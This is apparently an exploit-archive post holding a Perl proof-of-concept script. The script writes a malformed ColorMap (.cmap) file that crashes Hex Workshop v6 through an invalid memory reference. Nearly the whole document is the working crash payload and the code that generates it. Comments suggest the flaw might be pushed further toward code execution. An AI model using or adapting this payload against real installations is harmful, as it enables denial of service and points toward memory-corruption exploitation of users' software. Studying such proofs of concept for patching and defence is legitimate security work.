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Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC
Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC
Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC

#!/usr/bin/perl -w
# Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference crash POC
# Discovred by : DATA_SNIPER
# for more information vist my blog:http://datasniper.arab4services.net/
# the Exploit it's  very hard to implemented,if we can make the "reference" point to  valid memory location contain
# unicode string we can corrupt the memory and get code execution(it's not so easy as you can see,try it manually in olly).
print "==========================================================================\n";
print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\n";
print "Discovred by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "===================================================================== \n";
my $crash = '#Simple POC by DATA_SNIPER'."\n".'"%s"= RGB(0, 0, 0)'; #don't worry about it ,it's not Format string bug :)
my $file = "cr4sh.cmap" ;
open(my $data, ">>$file") or die "Cannot open $file";
print $data $crash;
print "$file has been created\n";
print "open it in HexWorkshop.\n";

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